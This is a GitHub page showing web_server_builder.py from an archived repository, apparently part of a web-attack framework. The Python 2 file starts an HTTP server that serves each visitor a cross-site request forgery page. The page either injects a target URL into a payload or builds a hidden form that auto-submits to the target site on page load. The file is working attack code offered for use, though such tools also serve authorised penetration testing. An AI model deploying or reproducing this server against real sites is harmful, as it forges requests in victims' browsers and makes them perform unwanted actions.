This repository has been archived by the owner on Jan 15, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 13
/
web_server_builder.py
66 lines (59 loc) · 2.18 KB
/
web_server_builder.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
import sys
import random
global_url = global_parameters = global_method = global_payload = ''
class HTTPHandler (SimpleHTTPRequestHandler):
server_version = "LibHttpWSF/1.0"
def do_GET(self):
print "[+] New connection: %s:%d" % (self.client_address[0], self.client_address[1])
self.index()
def prepare_request(self, csrf_name):
global global_url
global global_parameters
global global_method
global global_payload
if global_method.lower() == "get":
global_url += "?"
for key, value in global_parameters.items():
global_url += key + "=" + value + "&"
global_payload = global_payload.replace("[EXPLOIT]", global_url)
return global_payload
elif global_method.lower() == "post":
result = "<form id='"+csrf_name+"' action='"+global_url+"' method='post'>"
for key, value in global_parameters.items():
result += "<input type='hidden' name='"+key+"' value='"+value+"'>"
result += "</form>"
return result
def index(self):
global global_method
if global_method.lower() == "get":
html_response = '<html><head></head><body>'+self.prepare_request('')+'</body></html>'
else:
csrf_name = ''.join(random.choice('0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(36))
html_response = '<html><head></head><body onload="document.getElementById(\''+csrf_name+'\').submit()">'+self.prepare_request(csrf_name)+'</body></html>'
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", len(html_response))
self.end_headers()
self.wfile.write(html_response)
return SimpleHTTPRequestHandler.do_GET(self)
class WebServer:
"""
Initialise un serveur web sur le port 8080
"""
def __init__(self, port, url, parameters, method, payload):
global global_url
global global_parameters
global global_method
global global_payload
global_url = url
global_parameters = parameters
global_method = method
global_payload = payload
self.port = port
print("The web server is started on port %i" % self.port)
self.initialize()
def initialize(self):
server = HTTPServer(("",self.port), HTTPHandler)
server.serve_forever()